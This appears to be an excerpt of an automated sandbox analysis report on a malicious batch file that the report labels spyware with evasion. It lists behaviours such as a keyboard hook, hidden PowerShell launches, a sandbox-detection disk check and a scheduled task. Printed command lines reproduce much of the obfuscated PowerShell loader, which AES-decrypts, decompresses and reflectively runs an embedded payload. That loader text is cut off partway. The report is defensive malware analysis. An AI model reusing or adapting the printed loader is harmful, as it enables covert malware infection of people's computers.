        Source: svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2825302592.000002565B443000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1732166559.000002565B443000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#
        Source: svchost.exe, 00000029.00000002.2817889287.000002565B284000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1731065473.000002565B284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/pwaimages
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.5:49714 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_58eb6571-e
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_72dfcd9f-b
        Source: Yara matchFile source: 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 8748, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Found large BAT file
        Source: uy2g7z.batStatic file information: 6277741
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D193840 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,TlsSetValue,9_2_000001F66D193840
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D194038 NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,9_2_000001F66D194038
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D1935B8 NtEnumerateKey,NtEnumerateValueKey,9_2_000001F66D1935B8
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB93732EC NtQueryDirectoryFileEx,GetFileType,StrCpyW,14_2_0000019AB93732EC
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB9372D1C NtQuerySystemInformation,StrCmpNIW,14_2_0000019AB9372D1C
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D194038: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,9_2_000001F66D194038
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-CDdDgiS8Jump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 3_3_000001D54F9DE6643_3_000001D54F9DE664
        Source: C:\Windows\System32\cmd.exeCode function: 3_3_000001D54F9D34383_3_000001D54F9D3438
        Source: C:\Windows\System32\cmd.exeCode function: 3_3_000001D54F9DE7E83_3_000001D54F9DE7E8
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0F2643_2_000001D54FA0F264
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA040383_2_000001D54FA04038
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA0F3E83_2_000001D54FA0F3E8
        Source: C:\Windows\System32\conhost.exeCode function: 4_3_00000281B7B9E7E84_3_00000281B7B9E7E8
        Source: C:\Windows\System32\conhost.exeCode function: 4_3_00000281B7B934384_3_00000281B7B93438
        Source: C:\Windows\System32\conhost.exeCode function: 4_3_00000281B7B9E6644_3_00000281B7B9E664
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BCF3E84_2_00000281B7BCF3E8
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BC40384_2_00000281B7BC4038
        Source: C:\Windows\System32\conhost.exeCode function: 4_2_00000281B7BCF2644_2_00000281B7BCF264
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C776764C5_2_00007FF7C776764C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C77683B25_2_00007FF7C77683B2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C77620ED5_2_00007FF7C77620ED
        Source: C:\Windows\System32\more.comCode function: 9_3_000001F66CF4E7E89_3_000001F66CF4E7E8
        Source: C:\Windows\System32\more.comCode function: 9_3_000001F66CF434389_3_000001F66CF43438
        Source: C:\Windows\System32\more.comCode function: 9_3_000001F66CF4E6649_3_000001F66CF4E664
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D1940389_2_000001F66D194038
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D19F3E89_2_000001F66D19F3E8
        Source: C:\Windows\System32\more.comCode function: 9_2_000001F66D19F2649_2_000001F66D19F264
        Source: C:\Windows\System32\winlogon.exeCode function: 13_3_0000022FCEDFE66413_3_0000022FCEDFE664
        Source: C:\Windows\System32\winlogon.exeCode function: 13_3_0000022FCEDF343813_3_0000022FCEDF3438
        Source: C:\Windows\System32\winlogon.exeCode function: 13_3_0000022FCEDFE7E813_3_0000022FCEDFE7E8
        Source: C:\Windows\System32\lsass.exeCode function: 14_3_0000019AB934E7E814_3_0000019AB934E7E8
        Source: C:\Windows\System32\lsass.exeCode function: 14_3_0000019AB934343814_3_0000019AB9343438
        Source: C:\Windows\System32\lsass.exeCode function: 14_3_0000019AB934E66414_3_0000019AB934E664
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937F3E814_2_0000019AB937F3E8
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937403814_2_0000019AB9374038
        Source: C:\Windows\System32\lsass.exeCode function: 14_2_0000019AB937F26414_2_0000019AB937F264
        Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001A53E9BE7E815_3_000001A53E9BE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001A53E9B343815_3_000001A53E9B3438
        Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001A53E9BE66415_3_000001A53E9BE664
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDAF3E815_2_000001A53EDAF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDA403815_2_000001A53EDA4038
        Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001A53EDAF26415_2_000001A53EDAF264
        Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002382E97E66416_3_000002382E97E664
        Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002382E97E7E816_3_000002382E97E7E8
        Source: C:\Windows\System32\dwm.exeCode function: 16_3_000002382E97343816_3_000002382E973438
        Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000027D8F49E66417_3_0000027D8F49E664
        Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000027D8F49343817_3_0000027D8F493438
        Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000027D8F49E7E817_3_0000027D8F49E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4CF26417_2_0000027D8F4CF264
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4C403817_2_0000027D8F4C4038
        Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000027D8F4CF3E817_2_0000027D8F4CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000001AD09E7343818_3_000001AD09E73438
        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000001AD09E7E7E818_3_000001AD09E7E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_3_000001AD09E7E66418_3_000001AD09E7E664
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EA403818_2_000001AD09EA4038
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF3E818_2_000001AD09EAF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF26418_2_000001AD09EAF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000020EBF9DE7E819_3_0000020EBF9DE7E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000020EBF9D343819_3_0000020EBF9D3438
        Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000020EBF9DE66419_3_0000020EBF9DE664
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F26419_2_0000020EC013F264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F3E819_2_0000020EC013F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013403819_2_0000020EC0134038
        Source: C:\Windows\System32\svchost.exeCode function: 20_3_00000229EA67E7E820_3_00000229EA67E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_3_00000229EA67343820_3_00000229EA673438
        Source: C:\Windows\System32\svchost.exeCode function: 20_3_00000229EA67E66420_3_00000229EA67E664
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF3E820_2_00000229EA6AF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6A403820_2_00000229EA6A4038
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF26420_2_00000229EA6AF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF26421_2_000001777BDCF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDC403821_2_000001777BDC4038
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF3E821_2_000001777BDCF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF26422_2_000001590E6BF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6B403822_2_000001590E6B4038
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF3E822_2_000001590E6BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6403823_2_0000021C29A64038
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F3E823_2_0000021C29A6F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F26423_2_0000021C29A6F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000276D729E66424_3_00000276D729E664
        Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000276D729E7E824_3_00000276D729E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 24_3_00000276D729343824_3_00000276D7293438
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF26424_2_00000276D72CF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF3E824_2_00000276D72CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72C403824_2_00000276D72C4038
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000021D8469E7E825_3_0000021D8469E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000021D8469343825_3_0000021D84693438
        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000021D8469E66425_3_0000021D8469E664
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF3E825_2_0000021D846CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846C403825_2_0000021D846C4038
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF26425_2_0000021D846CF264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA6343826_2_0000025BFDA63438
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA6E7E826_2_0000025BFDA6E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA6E66426_2_0000025BFDA6E664
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9403826_2_0000025BFDA94038
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F3E826_2_0000025BFDA9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F26426_2_0000025BFDA9F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_000001691453E66427_3_000001691453E664
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_000001691453343827_3_0000016914533438
        Source: C:\Windows\System32\svchost.exeCode function: 27_3_000001691453E7E827_3_000001691453E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F26427_2_000001691456F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456403827_2_0000016914564038
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F3E827_2_000001691456F3E8
        Source: C:\Windows\System32\conhost.exeCode function: String function: 00000281B7BC2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001777BDC2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000021D846C2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000016914562680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 00000276D72C2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000025BFDA92680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 00000229EA6A2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001A53EDA2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001590E6B2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000021C29A62680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000027D8F4C2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000020EC0132680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001AD09EA2680 appears 44 times
        Source: C:\Windows\System32\more.comCode function: String function: 000001F66D192680 appears 44 times
        Source: C:\Windows\System32\cmd.exeCode function: String function: 000001D54FA02680 appears 44 times
        Source: C:\Windows\System32\lsass.exeCode function: String function: 0000019AB9372680 appears 44 times
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4219
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4219Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 8748, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spyw.evad.winBAT@19/77@1/7
        Source: C:\Windows\System32\cmd.exeCode function: 3_2_000001D54FA03BB8 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,3_2_000001D54FA03BB8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8336:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8516:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\2477ed4e-816f-4341-b12d-9227965e6cdf
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12bh2lq2.hrr.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
        Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWM
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\more.com more
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uy2g7z.bat" wjzJMHoFZaIaceAGUG "Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw 